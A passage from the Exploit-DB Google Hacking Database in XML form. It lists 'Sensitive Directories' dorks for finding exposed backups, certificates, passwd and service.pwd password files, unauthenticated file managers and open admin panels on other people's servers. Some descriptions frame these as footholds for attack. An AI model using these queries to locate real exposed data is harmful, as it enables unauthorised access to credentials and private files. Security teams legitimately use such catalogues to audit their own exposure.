<category>Sensitive Directories</category>
<shortDescription>inurl:/wp-content/uploads/wp-file-manager-pro</shortDescription>
<textualDescription>Description : inurl:/wp-content/uploads/wp-file-manager-pro
This google dork gives us the Sensitive Directories details of
misconfigured servers.
</textualDescription>
<query>inurl:/wp-content/uploads/wp-file-manager-pro</query>
<querystring>https://www.google.com/search?q=inurl:/wp-content/uploads/wp-file-manager-pro</querystring>
<edb></edb>
<date>2021-04-13</date>
<author>Aditya Bhosale</author>
</entry>
<entry>
<id>6878</id>
<link>https://www.exploit-db.com/ghdb/6878</link>
<category>Sensitive Directories</category>
<shortDescription>inurl:/wp-content/uploads/wp-file-manager-pro/fm_backup</shortDescription>
<textualDescription># Google Dork: inurl:/wp-content/uploads/wp-file-manager-pro/fm_backup
# Sensitive Directories
# Date: 18/04/2021
# Exploit Author: Aftab Alam
</textualDescription>
<query>inurl:/wp-content/uploads/wp-file-manager-pro/fm_backup</query>
<querystring>https://www.google.com/search?q=inurl:/wp-content/uploads/wp-file-manager-pro/fm_backup</querystring>
<edb></edb>
<date>2021-04-19</date>
<author>Aftab Alam</author>
</entry>
<entry>
<id>3994</id>
<link>https://www.exploit-db.com/ghdb/3994</link>
<category>Sensitive Directories</category>
<shortDescription>inurl:/wp-content/wpbackitup_backups</shortDescription>
<textualDescription>Relates to https://wordpress.org/plugins/wp-backitup/
Sensitive data/site rips/db rips in public accessible folders
Mr T3st3r</textualDescription>
<query>inurl:/wp-content/wpbackitup_backups</query>
<querystring>https://www.google.com/search?q=inurl:/wp-content/wpbackitup_backups</querystring>
<edb></edb>
<date>2015-02-27</date>
<author>anonymous</author>
</entry>
<entry>
<id>4883</id>
<link>https://www.exploit-db.com/ghdb/4883</link>
<category>Sensitive Directories</category>
<shortDescription>inurl:/wp-includes/certificates/</shortDescription>
<textualDescription>inurl:/wp-includes/certificates/
Find a lot of certificates from websites
</textualDescription>
<query>inurl:/wp-includes/certificates/</query>
<querystring>https://www.google.com/search?q=inurl:/wp-includes/certificates/</querystring>
<edb></edb>
<date>2018-07-04</date>
<author>Bl4kd43m0n</author>
</entry>
<entry>
<id>5460</id>
<link>https://www.exploit-db.com/ghdb/5460</link>
<category>Sensitive Directories</category>
<shortDescription>inurl:/wp/wp-admin/</shortDescription>
<textualDescription>sensitive directories:
inurl:/wp/wp-admin/
Reza Abasi(Turku)
</textualDescription>
<query>inurl:/wp/wp-admin/</query>
<querystring>https://www.google.com/search?q=inurl:/wp/wp-admin/</querystring>
<edb></edb>
<date>2019-08-27</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>3753</id>
<link>https://www.exploit-db.com/ghdb/3753</link>
<category>Sensitive Directories</category>
<shortDescription>inurl:/xampp</shortDescription>
<textualDescription>this dork looks for servers with xampp installed</textualDescription>
<query>inurl:/xampp</query>
<querystring>https://www.google.com/search?q=inurl:/xampp</querystring>
<edb></edb>
<date>2011-11-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>5514</id>
<link>https://www.exploit-db.com/ghdb/5514</link>
<category>Sensitive Directories</category>
<shortDescription>inurl:/_vti_txt*</shortDescription>
<textualDescription>Google Dorks for Sensitive Directories</textualDescription>
<query>inurl:/_vti_txt*</query>
<querystring>https://www.google.com/search?q=inurl:/_vti_txt*</querystring>
<edb></edb>
<date>2019-09-10</date>
<author>Renato Hormazabal</author>
</entry>
<entry>
<id>6623</id>
<link>https://www.exploit-db.com/ghdb/6623</link>
<category>Sensitive Directories</category>
<shortDescription>inurl:8080 + intext:&quot;httpfileserver 2.3&quot;</shortDescription>
<textualDescription># Google Dork: inurl:8080 + intext:&quot;httpfileserver 2.3&quot;
# Sensitive directories.
# Date: 20/10/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>inurl:8080 + intext:&quot;httpfileserver 2.3&quot;</query>
<querystring>https://www.google.com/search?q=inurl:8080 + intext:&quot;httpfileserver 2.3&quot;</querystring>
<edb></edb>
<date>2020-10-20</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>3876</id>
<link>https://www.exploit-db.com/ghdb/3876</link>
<category>Sensitive Directories</category>
<shortDescription>inurl:8080 intitle:&quot;Dashboard [Jenkins]&quot;</shortDescription>
<textualDescription>#Summary: Acces to Jenkins Dashboard
#Author: g00gl3 5c0u7</textualDescription>
<query>inurl:8080 intitle:&quot;Dashboard [Jenkins]&quot;</query>
<querystring>https://www.google.com/search?q=inurl:8080 intitle:&quot;Dashboard [Jenkins]&quot;</querystring>
<edb></edb>
<date>2013-08-08</date>
<author>anonymous</author>
</entry>
<entry>
<id>4378</id>
<link>https://www.exploit-db.com/ghdb/4378</link>
<category>Sensitive Directories</category>
<shortDescription>inurl:admin inurl:uploads</shortDescription>
<textualDescription>Fishes images and text from upload sites
- Toby</textualDescription>
<query>inurl:admin inurl:uploads</query>
<querystring>https://www.google.com/search?q=inurl:admin inurl:uploads</querystring>
<edb></edb>
<date>2016-12-29</date>
<author>anonymous</author>
</entry>
<entry>
<id>5493</id>
<link>https://www.exploit-db.com/ghdb/5493</link>
<category>Sensitive Directories</category>
<shortDescription>inurl:admin/data* intext:index of</shortDescription>
<textualDescription>Google Dork: inurl:admin/data* intext:index of
Category: Files Containing Juicy Info.
Author:Abhishek Samaddar
</textualDescription>
<query>inurl:admin/data* intext:index of</query>
<querystring>https://www.google.com/search?q=inurl:admin/data* intext:index of</querystring>
<edb></edb>
<date>2019-09-03</date>
<author>Abhishek Samaddar</author>
</entry>
<entry>
<id>6293</id>
<link>https://www.exploit-db.com/ghdb/6293</link>
<category>Sensitive Directories</category>
<shortDescription>inurl:admin/data* intext:index of</shortDescription>
<textualDescription>*GOOGLE DORK : inurl:admin/data* intext:index of*
*AUTHOR : ANJALI PRAKASH*
</textualDescription>
<query>inurl:admin/data* intext:index of</query>
<querystring>https://www.google.com/search?q=inurl:admin/data* intext:index of</querystring>
<edb></edb>
<date>2020-06-16</date>
<author>Anjali Prakash</author>
</entry>
<entry>
<id>130</id>
<link>https://www.exploit-db.com/ghdb/130</link>
<category>Sensitive Directories</category>
<shortDescription>inurl:backup intitle:index.of inurl:admin</shortDescription>
<textualDescription>This query reveals backup directories. These directories can contain various information ranging from source code, sql tables, userlists, and even passwords.</textualDescription>
<query>inurl:backup intitle:index.of inurl:admin</query>
<querystring>https://www.google.com/search?q=inurl%3Abackup+intitle%3Aindex.of+inurl%3Aadmin&amp;btnG=Google+Search</querystring>
<edb></edb>
<date>2004-03-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>5219</id>
<link>https://www.exploit-db.com/ghdb/5219</link>
<category>Sensitive Directories</category>
<shortDescription>inurl:bc.googleusercontent.com intitle:index of</shortDescription>
<textualDescription>dork that enumerates GCP for sensitive directories
*Google Dork*
inurl:bc.googleusercontent.com intitle:index of
*Dates: *21-05-2019
*Dork Author:* acc3ssp0int</textualDescription>
<query>inurl:bc.googleusercontent.com intitle:index of</query>
<querystring>https://www.google.com/search?q=inurl:bc.googleusercontent.com intitle:index of</querystring>
<edb></edb>
<date>2019-05-21</date>
<author>acc3ssp0int</author>
</entry>
<entry>
<id>3806</id>
<link>https://www.exploit-db.com/ghdb/3806</link>
<category>Sensitive Directories</category>
<shortDescription>inurl:ckfinder intext:&quot;ckfinder.html&quot; intitle:&quot;Index of /ckfinder&quot;</shortDescription>
<textualDescription>Dork: inurl:ckfinder intext:&quot;ckfinder.html&quot; intitle:&quot;Index of /ckfinder&quot;
Use this dork to find root directory of CKFinder (all versions) with
ckfinder.html file (used to upload, modify and delete files on the server)
Submitted by: CodiObert</textualDescription>
<query>inurl:ckfinder intext:&quot;ckfinder.html&quot; intitle:&quot;Index of /ckfinder&quot;</query>
<querystring>https://www.google.com/search?q=inurl:ckfinder intext:&quot;ckfinder.html&quot; intitle:&quot;Index of /ckfinder&quot;</querystring>
<edb></edb>
<date>2012-11-02</date>
<author>anonymous</author>
</entry>
<entry>
<id>5752</id>
<link>https://www.exploit-db.com/ghdb/5752</link>
<category>Sensitive Directories</category>
<shortDescription>inurl:concrete/config/</shortDescription>
<textualDescription>Interesting directories from concrete5 cms exploiting directory listing.
inurl:concrete/config/
Interesting directories from concrete5 cms exploiting directory listing
shoing config dir.
By
Sagar Banwa
</textualDescription>
<query>inurl:concrete/config/</query>
<querystring>https://www.google.com/search?q=inurl:concrete/config/</querystring>
<edb></edb>
<date>2020-02-24</date>
<author>Sagar Banwa</author>
</entry>
<entry>
<id>325</id>
<link>https://www.exploit-db.com/ghdb/325</link>
<category>Sensitive Directories</category>
<shortDescription>inurl:explorer.cfm inurl:(dirpath|This_Directory)</shortDescription>
<textualDescription>Filemanager without authentication.</textualDescription>
<query>inurl:explorer.cfm inurl:(dirpath|This_Directory)</query>
<querystring>https://www.google.com/search?c2coff=1&amp;q=inurl%3Aexplorer.cfm+inurl%3A%28dirpath%7CThis_Directory%29</querystring>
<edb></edb>
<date>2004-10-31</date>
<author>anonymous</author>
</entry>
<entry>
<id>4998</id>
<link>https://www.exploit-db.com/ghdb/4998</link>
<category>Sensitive Directories</category>
<shortDescription>inurl:filebrowser.wcgp?subDir Communigate</shortDescription>
<textualDescription>Google Dork Description: Access Public and protected CommunigatePro mail server users' files.
Author: Boumediene KADDOUR
date: 10/25/2018
Google Search: inurl:filebrowser.wcgp?subDir Communigate
</textualDescription>
<query>inurl:filebrowser.wcgp?subDir Communigate</query>
<querystring>https://www.google.com/search?q=inurl:filebrowser.wcgp?subDir Communigate</querystring>
<edb></edb>
<date>2018-10-25</date>
<author>Boumediene KADDOUR</author>
</entry>
<entry>
<id>7076</id>
<link>https://www.exploit-db.com/ghdb/7076</link>
<category>Sensitive Directories</category>
<shortDescription>inurl:filemanager/upload/asp/ &quot;index of&quot;</shortDescription>
<textualDescription># Google Dork: inurl:filemanager/upload/asp/ &quot;index of&quot;
# Category: Sensitive Directories
# Date: 03/07/2021
# Exploit Author: s Thakur
</textualDescription>
<query>inurl:filemanager/upload/asp/ &quot;index of&quot;</query>
<querystring>https://www.google.com/search?q=inurl:filemanager/upload/asp/ &quot;index of&quot;</querystring>
<edb></edb>
<date>2021-08-23</date>
<author>s Thakur</author>
</entry>
<entry>
<id>1250</id>
<link>https://www.exploit-db.com/ghdb/1250</link>
<category>Sensitive Directories</category>
<shortDescription>inurl:install.pl intext:&quot;Reading path paramaters&quot; -edu</shortDescription>
<textualDescription>Excelent information for foot holds. Everything from OS, to forum software, etc. Other exploits possible</textualDescription>
<query>inurl:install.pl intext:&quot;Reading path paramaters&quot; -edu</query>
<querystring>https://www.google.com/search?q=inurl:install.pl+intext:%22Reading+path+paramaters%22+-edu&amp;hs=cFH&amp;safe=off&amp;rls=org.mozilla:en-US:official&amp;filter=0</querystring>
<edb></edb>
<date>2006-01-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>187</id>
<link>https://www.exploit-db.com/ghdb/187</link>
<category>Sensitive Directories</category>
<shortDescription>inurl:j2ee/examples/jsp</shortDescription>
<textualDescription>This directory contains sample JSP scripts which are installed on the server. These programs may have security vulnerabilities and can be used by an attacker to footprint the server.</textualDescription>
<query>inurl:j2ee/examples/jsp</query>
<querystring>https://www.google.com/search?q=inurl%3Aj2ee%2Fexamples%2Fjsp</querystring>
<edb></edb>
<date>2004-04-28</date>
<author>anonymous</author>
</entry>
<entry>
<id>6311</id>
<link>https://www.exploit-db.com/ghdb/6311</link>
<category>Sensitive Directories</category>
<shortDescription>inurl:member filetype:xls</shortDescription>
<textualDescription>Dork:- inurl:member filetype:xls
Description:- This dork can find Excel spreadsheets in an members
directory. Many times these documents contain sensitive information.
Author : GAGAN KUMAR JHA
DATE: 18/06/2020
Linkedin: https://www.linkedin.com/in/gagan-kumar-jha55/
</textualDescription>
<query>inurl:member filetype:xls</query>
<querystring>https://www.google.com/search?q=inurl:member filetype:xls</querystring>
<edb></edb>
<date>2020-06-18</date>
<author>GAGAN KUMAR JHA</author>
</entry>
<entry>
<id>6617</id>
<link>https://www.exploit-db.com/ghdb/6617</link>
<category>Sensitive Directories</category>
<shortDescription>inurl:node_modules/mqtt/test/helpers/</shortDescription>
<textualDescription>Author: Rahul Parmar
Google Dork : inurl:node_modules/mqtt/test/helpers/
Date: 15-Oct-2020
Expose Private key
</textualDescription>
<query>inurl:node_modules/mqtt/test/helpers/</query>
<querystring>https://www.google.com/search?q=inurl:node_modules/mqtt/test/helpers/</querystring>
<edb></edb>
<date>2020-10-15</date>
<author>Rahul Parmar</author>
</entry>
<entry>
<id>188</id>
<link>https://www.exploit-db.com/ghdb/188</link>
<category>Sensitive Directories</category>
<shortDescription>inurl:ojspdemos</shortDescription>
<textualDescription>This directory contains sample Oracle JSP scripts which are installed on the server. These programs may have security vulnerabilities and can be used by an attacker to footprint the server.</textualDescription>
<query>inurl:ojspdemos</query>
<querystring>https://www.google.com/search?q=inurl%3Aojspdemos</querystring>
<edb></edb>
<date>2004-04-28</date>
<author>anonymous</author>
</entry>
<entry>
<id>4313</id>
<link>https://www.exploit-db.com/ghdb/4313</link>
<category>Sensitive Directories</category>
<shortDescription>inurl:pictures intitle:index.of</shortDescription>
<textualDescription>inurl:pictures intitle:index.of
Loads of personal pictures and what not
Sent from trump tower </textualDescription>
<query>inurl:pictures intitle:index.of</query>
<querystring>https://www.google.com/search?q=inurl:pictures intitle:index.of</querystring>
<edb></edb>
<date>2016-07-27</date>
<author>anonymous</author>
</entry>
<entry>
<id>4120</id>
<link>https://www.exploit-db.com/ghdb/4120</link>
<category>Sensitive Directories</category>
<shortDescription>inurl:pipermail intitle:index.of parent</shortDescription>
<textualDescription>Pipermail Archives
Decoy</textualDescription>
<query>inurl:pipermail intitle:index.of parent</query>
<querystring>https://www.google.com/search?q=inurl:pipermail intitle:index.of parent</querystring>
<edb></edb>
<date>2015-11-11</date>
<author>anonymous</author>
</entry>
<entry>
<id>6774</id>
<link>https://www.exploit-db.com/ghdb/6774</link>
<category>Sensitive Directories</category>
<shortDescription>inurl:print.htm intext:&quot;Domain Name:&quot; + &quot;Open printable report&quot;</shortDescription>
<textualDescription># Google Dork: inurl:print.htm intext:&quot;Domain Name:&quot; + &quot;Open printable report&quot;
# Sensitive directories.
# Date: 27/1/2021
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>inurl:print.htm intext:&quot;Domain Name:&quot; + &quot;Open printable report&quot;</query>
<querystring>https://www.google.com/search?q=inurl:print.htm intext:&quot;Domain Name:&quot; + &quot;Open printable report&quot;</querystring>
<edb></edb>
<date>2021-02-01</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>4017</id>
<link>https://www.exploit-db.com/ghdb/4017</link>
<category>Sensitive Directories</category>
<shortDescription>inurl:private_files</shortDescription>
<textualDescription>Directory private files xD.
By Rootkit.</textualDescription>
<query>inurl:private_files</query>
<querystring>https://www.google.com/search?q=inurl:private_files</querystring>
<edb></edb>
<date>2015-06-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>4825</id>
<link>https://www.exploit-db.com/ghdb/4825</link>
<category>Sensitive Directories</category>
<shortDescription>inurl:revslider inurl:'/revslider+port'</shortDescription>
<textualDescription>infos and symlinks to revslider folders upload, plugins and settings,
server and port.
geezazkrays
i was just searching in google if which port of revslider they use, and
this were the googledork showed me.
</textualDescription>
<query>inurl:revslider inurl:'/revslider+port'</query>
<querystring>https://www.google.com/search?q=inurl:revslider inurl:'/revslider+port'</querystring>
<edb></edb>
<date>2018-05-16</date>
<author>geezazkrays</author>
</entry>
<entry>
<id>4207</id>
<link>https://www.exploit-db.com/ghdb/4207</link>
<category>Sensitive Directories</category>
<shortDescription>inurl:safm.asp ext:asp</shortDescription>
<textualDescription>inurl:safm.asp ext:asp
http://atawho.blogspot.com.tr/2016/03/simple-asp-filemanager.html
atawho-sonadam</textualDescription>
<query>inurl:safm.asp ext:asp</query>
<querystring>https://www.google.com/search?q=inurl:safm.asp ext:asp</querystring>
<edb></edb>
<date>2016-03-07</date>
<author>anonymous</author>
</entry>
<entry>
<id>6782</id>
<link>https://www.exploit-db.com/ghdb/6782</link>
<category>Sensitive Directories</category>
<shortDescription>inurl:tcpconfig.html</shortDescription>
<textualDescription>Dorks: inurl:tcpconfig.html
Category: Various Online Devices
Summary:
A Google dork that gives the online Device information.
</textualDescription>
<query>inurl:tcpconfig.html</query>
<querystring>https://www.google.com/search?q=inurl:tcpconfig.html</querystring>
<edb></edb>
<date>2021-02-08</date>
<author>Prasad Lingamaiah</author>
</entry>
<entry>
<id>4295</id>
<link>https://www.exploit-db.com/ghdb/4295</link>
<category>Sensitive Directories</category>
<shortDescription>inurl:trash intitle:index.of</shortDescription>
<textualDescription>One man's trash is another man's treasure.
inurl:trash intitle:index.of
Decoy</textualDescription>
<query>inurl:trash intitle:index.of</query>
<querystring>https://www.google.com/search?q=inurl:trash intitle:index.of</querystring>
<edb></edb>
<date>2016-06-06</date>
<author>anonymous</author>
</entry>
<entry>
<id>5142</id>
<link>https://www.exploit-db.com/ghdb/5142</link>
<category>Sensitive Directories</category>
<shortDescription>inurl:typo3conf/l10n/</shortDescription>
<textualDescription>Interesting directories from typo3 cms exploiting directory listing.
By Rayen Messaoudi (PsycoR)
</textualDescription>
<query>inurl:typo3conf/l10n/</query>
<querystring>https://www.google.com/search?q=inurl:typo3conf/l10n/</querystring>
<edb></edb>
<date>2019-03-04</date>
<author>PsycoR</author>
</entry>
<entry>
<id>4095</id>
<link>https://www.exploit-db.com/ghdb/4095</link>
<category>Sensitive Directories</category>
<shortDescription>inurl:users intitle:index.of</shortDescription>
<textualDescription>http://www.google.com/search?q=inurl:users intitle:index.of
User folders containing interesting files.
Decoy</textualDescription>
<query>inurl:users intitle:index.of</query>
<querystring>https://www.google.com/search?q=inurl:users intitle:index.of</querystring>
<edb></edb>
<date>2015-10-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>4009</id>
<link>https://www.exploit-db.com/ghdb/4009</link>
<category>Sensitive Directories</category>
<shortDescription>inurl:wp-admin/ intext:css/</shortDescription>
<textualDescription>The dork finds misconfigured WordPress sites.
Author:NickiK.</textualDescription>
<query>inurl:wp-admin/ intext:css/</query>
<querystring>https://www.google.com/search?q=inurl:wp-admin/ intext:css/</querystring>
<edb></edb>
<date>2015-05-27</date>
<author>anonymous</author>
</entry>
<entry>
<id>5513</id>
<link>https://www.exploit-db.com/ghdb/5513</link>
<category>Sensitive Directories</category>
<shortDescription>inurl:wp-content intext:backup-db</shortDescription>
<textualDescription>I have tested a dork in the Google Search and have found interesting
results.
Dork : *inurl:wp-content intext:backup-db*
- This gives us the result of Various backup files/Folders stored in
wp-content/uploads directories of various websites.
- It also gives database backups consisting of SQL backup files of
various websites who have not secured their sensitive directories.
Kaustubh Kale
</textualDescription>
<query>inurl:wp-content intext:backup-db</query>
<querystring>https://www.google.com/search?q=inurl:wp-content intext:backup-db</querystring>
<edb></edb>
<date>2019-09-10</date>
<author>Kaustubh Kale</author>
</entry>
<entry>
<id>6875</id>
<link>https://www.exploit-db.com/ghdb/6875</link>
<category>Sensitive Directories</category>
<shortDescription>inurl:wp-content/uploads/ intitle:logs</shortDescription>
<textualDescription>Description: inurl:wp-content/uploads/ intitle:logs
This google dork gives us the Sensitive Directories details of misconfigured servers.
</textualDescription>
<query>inurl:wp-content/uploads/ intitle:logs</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/uploads/ intitle:logs</querystring>
<edb></edb>
<date>2021-04-19</date>
<author>Gustavo Kuhl</author>
</entry>
<entry>
<id>6302</id>
<link>https://www.exploit-db.com/ghdb/6302</link>
<category>Sensitive Directories</category>
<shortDescription>inurl:_vti_pvt/service.pwd</shortDescription>
<textualDescription># Google Dork: inurl:_vti_pvt/service.pwd
# Juicy information and sensitive directories including passwords.
# Date: 17/06/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>inurl:_vti_pvt/service.pwd</query>
<querystring>https://www.google.com/search?q=inurl:_vti_pvt/service.pwd</querystring>
<edb></edb>
<date>2020-06-17</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>1177</id>
<link>https://www.exploit-db.com/ghdb/1177</link>
<category>Sensitive Directories</category>
<shortDescription>log inurl:linklint filetype:txt -&quot;checking&quot;</shortDescription>
<textualDescription>Linklint is an Open Source Perl program that checks links on web sites. This search finds the Linklint log directory. Complete site map able to be recreated, and if you go back one directory you can see all the other files generated by linklint. Thanks to CP for direction.</textualDescription>
<query>log inurl:linklint filetype:txt -&quot;checking&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;c2coff=1&amp;q=log+inurl%3Alinklint+filetype%3Atxt+-%22checking%22</querystring>
<edb></edb>
<date>2005-11-11</date>
<author>anonymous</author>
</entry>
<entry>
<id>15</id>
<link>https://www.exploit-db.com/ghdb/15</link>
<category>Sensitive Directories</category>
<shortDescription>Look in my backup directories! Please?</shortDescription>
<textualDescription>Backup directories are often very interesting places to explore. More than one server has been compromised by a hacker's discovery of sensitive information contained in backup files or directories. Some of the sites in this search meant to reveal the contents of their backup directories, others did not. Think about it. What.s in YOUR backup directories? Would you care to share the contents with the whole of the online world? Probably not. Whether intentional or not, bsp.gsa.gov reveals backup directory through Google. Is this simply yet another misconfigured .gov site? You decide. BSP stands for &quot;best security practices,&quot; winning this site the Top GoogleDork award for this category.</textualDescription>
<query>&quot;Index of /backup&quot;</query>
<querystring>https://www.google.com/search?q=%22Index+of+/backup%22&amp;num=100&amp;filter=0</querystring>
<edb></edb>
<date>2003-06-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>4093</id>
<link>https://www.exploit-db.com/ghdb/4093</link>
<category>Sensitive Directories</category>
<shortDescription>mail spool intitle:index.of</shortDescription>
<textualDescription>Dork for mail spools.
Decoy</textualDescription>
<query>mail spool intitle:index.of</query>
<querystring>https://www.google.com/search?q=mail spool intitle:index.of</querystring>
<edb></edb>
<date>2015-10-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>4450</id>
<link>https://www.exploit-db.com/ghdb/4450</link>
<category>Sensitive Directories</category>
<shortDescription>powered by h5ai</shortDescription>
<textualDescription>Google Dork: powered by h5ai
*You can browse through files*
NEAM :- Helmi</textualDescription>
<query>powered by h5ai</query>
<querystring>https://www.google.com/search?q=powered by h5ai</querystring>
<edb></edb>
<date>2017-05-01</date>
<author>anonymous</author>
</entry>
<entry>
<id>34</id>
<link>https://www.exploit-db.com/ghdb/34</link>
<category>Sensitive Directories</category>
<shortDescription>private</shortDescription>
<textualDescription>What kinds of things might you find in directories marked &quot;private?&quot; let's find out....</textualDescription>
<query>index.of.private</query>
<querystring>https://www.google.com/search?q=intitle%3Aindex%2Eof%2Eprivate</querystring>
<edb></edb>
<date>2003-06-27</date>
<author>anonymous</author>
</entry>
<entry>
<id>4094</id>
<link>https://www.exploit-db.com/ghdb/4094</link>
<category>Sensitive Directories</category>
<shortDescription>private parent intitle:index.of</shortDescription>
<textualDescription>http://www.google.com/search?q=private parent intitle:index.of
Dork for all sorts of juicy stuff!
Decoy</textualDescription>
<query>private parent intitle:index.of</query>
<querystring>https://www.google.com/search?q=private parent intitle:index.of</querystring>
<edb></edb>
<date>2015-10-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>38</id>
<link>https://www.exploit-db.com/ghdb/38</link>
<category>Sensitive Directories</category>
<shortDescription>protected</shortDescription>
<textualDescription>What could be in a directory marked as &quot;protected?&quot; Let's find out...</textualDescription>
<query>index.of.protected</query>
<querystring>https://www.google.com/search?safe=off&amp;q=inurl%3Aindex.of.protected&amp;btnG=Google+Search</querystring>
<edb></edb>
<date>2003-06-27</date>
<author>anonymous</author>
</entry>
<entry>
<id>33</id>
<link>https://www.exploit-db.com/ghdb/33</link>
<category>Sensitive Directories</category>
<shortDescription>secret</shortDescription>
<textualDescription>What kinds of goodies lurk in directories marked as &quot;secret?&quot; Find out...</textualDescription>
<query>index.of.secret</query>
<querystring>https://www.google.com/search?q=intitle:index.of.secret&amp;safe=off&amp;start=0&amp;sa=N</querystring>
<edb></edb>
<date>2003-06-27</date>
<author>anonymous</author>
</entry>
<entry>
<id>37</id>
<link>https://www.exploit-db.com/ghdb/37</link>
<category>Sensitive Directories</category>
<shortDescription>secure</shortDescription>
<textualDescription>What could be hiding in directories marked as &quot;secure?&quot; let's find out...</textualDescription>
<query>index.of.secure</query>
<querystring>https://www.google.com/search?q=intitle:%22index.of.secure%22&amp;safe=off&amp;start=0&amp;sa=N</querystring>
<edb></edb>
<date>2003-06-27</date>
<author>anonymous</author>
</entry>
<entry>
<id>5568</id>
<link>https://www.exploit-db.com/ghdb/5568</link>
<category>Sensitive Directories</category>
<shortDescription>site:* index of: *.exe</shortDescription>
<textualDescription>*DORK: *site:* index of: *.exe
*AUTHOR*: Paras Arora(PAC Security)
*DATE*: 12 October 2019
*Category*: Juicy Files
</textualDescription>
<query>site:* index of: *.exe</query>
<querystring>https://www.google.com/search?q=site:* index of: *.exe</querystring>
<edb></edb>
<date>2019-10-18</date>
<author>Paras Arora</author>
</entry>
<entry>
<id>5594</id>
<link>https://www.exploit-db.com/ghdb/5594</link>
<category>Sensitive Directories</category>
<shortDescription>site:* index of: /config</shortDescription>
<textualDescription>*DORK: *site:* index of: /config
AUTHOR: Paras Arora(PAC Security)
DATE: 22nd October 2019
CATEGORY: Juicy Files
</textualDescription>
<query>site:* index of: /config</query>
<querystring>https://www.google.com/search?q=site:* index of: /config</querystring>
<edb></edb>
<date>2019-10-22</date>
<author>Paras Arora</author>
</entry>
<entry>
<id>5620</id>
<link>https://www.exploit-db.com/ghdb/5620</link>
<category>Sensitive Directories</category>
<shortDescription>site:* index.of: /android/manifest.xml</shortDescription>
<textualDescription>Dork: site:* index.of: /android/manifest.xml
Author: Paras Arora(PAC Security)
Date: 5th Nov 2019
Category: Android Files
</textualDescription>
<query>site:* index.of: /android/manifest.xml</query>
<querystring>https://www.google.com/search?q=site:* index.of: /android/manifest.xml</querystring>
<edb></edb>
<date>2019-11-05</date>
<author>Paras Arora</author>
</entry>
<entry>
<id>5603</id>
<link>https://www.exploit-db.com/ghdb/5603</link>
<category>Sensitive Directories</category>
<shortDescription>site:*/logs/default.htm</shortDescription>
<textualDescription>Sensitive directories:
site:*/logs/default.htm
Reza Abasi(Turku)
</textualDescription>
<query>site:*/logs/default.htm</query>
<querystring>https://www.google.com/search?q=site:*/logs/default.htm</querystring>
<edb></edb>
<date>2019-10-29</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5457</id>
<link>https://www.exploit-db.com/ghdb/5457</link>
<category>Sensitive Directories</category>
<shortDescription>site:*/wordpress/wordpress.bak/</shortDescription>
<textualDescription>sensitive directory:
site:*/wordpress/wordpress.bak/
Reza Abasi(Turku)
</textualDescription>
<query>site:*/wordpress/wordpress.bak/</query>
<querystring>https://www.google.com/search?q=site:*/wordpress/wordpress.bak/</querystring>
<edb></edb>
<date>2019-08-27</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5423</id>
<link>https://www.exploit-db.com/ghdb/5423</link>
<category>Sensitive Directories</category>
<shortDescription>site:*/wp-contents/ inurl:/wp-contents/</shortDescription>
<textualDescription>Sensitive Directory:
site:*/wp-contents/ inurl:/wp-contents/
site:*/wp-contents/uploads/ inurl:/wp-contents/uploads/
Reza Abasi
</textualDescription>
<query>site:*/wp-contents/ inurl:/wp-contents/</query>
<querystring>https://www.google.com/search?q=site:*/wp-contents/ inurl:/wp-contents/</querystring>
<edb></edb>
<date>2019-08-21</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5422</id>
<link>https://www.exploit-db.com/ghdb/5422</link>
<category>Sensitive Directories</category>
<shortDescription>site:*/wp-includes/ inurl:/wp-includes/</shortDescription>
<textualDescription>Sensitive Directory:
site:*/wp-includes/ inurl:/wp-includes/
Reza Abasi
</textualDescription>
<query>site:*/wp-includes/ inurl:/wp-includes/</query>
<querystring>https://www.google.com/search?q=site:*/wp-includes/ inurl:/wp-includes/</querystring>
<edb></edb>
<date>2019-08-21</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>7912</id>
<link>https://www.exploit-db.com/ghdb/7912</link>
<category>Sensitive Directories</category>
<shortDescription>site:com intitle:index of \..\..\..\..\..\..\..\..\..\etc\passwd</shortDescription>
<textualDescription>This google dork gives us *passwd files* in *.com* top level domains .
*/etc/passwd* file contains files list of users in Linux
Regards,
*Supriyo Guha*
</textualDescription>
<query>site:com intitle:index of ..................etcpasswd</query>
<querystring>https://www.google.com/search?q=site:com intitle:index of \..\..\..\..\..\..\..\..\..\etc\passwd</querystring>
<edb></edb>
<date>2022-06-16</date>
<author>Supriyo Guha</author>
</entry>
<entry>
<id>5512</id>
<link>https://www.exploit-db.com/ghdb/5512</link>
<category>Sensitive Directories</category>
<shortDescription>site:ftp.* index of /ftp/backup</shortDescription>
<textualDescription>To View *Backup* files on *FTP* server of various websites
*Dork: site:ftp.* index of /ftp/backup*
*Author: Paras Arora(PAC Security)*
*Date: 9th September 2019*
*Category: Backup files on FTP Server*
</textualDescription>
<query>site:ftp.* index of /ftp/backup</query>
<querystring>https://www.google.com/search?q=site:ftp.* index of /ftp/backup</querystring>
<edb></edb>
<date>2019-09-10</date>
<author>Paras Arora</author>
</entry>
<entry>
<id>4397</id>
<link>https://www.exploit-db.com/ghdb/4397</link>
<category>Sensitive Directories</category>
<shortDescription>site:onedrive.live.com shared by</shortDescription>
<textualDescription>site:onedrive.live.com shared by
This dork identified shared archives in oneDrive.
It is important to be logged in to view the documents.
- Thiago Barros</textualDescription>
<query>site:onedrive.live.com shared by</query>
<querystring>https://www.google.com/search?q=site:onedrive.live.com shared by</querystring>
<edb></edb>
<date>2017-02-14</date>
<author>anonymous</author>
</entry>
<entry>
<id>6674</id>
<link>https://www.exploit-db.com/ghdb/6674</link>
<category>Sensitive Directories</category>
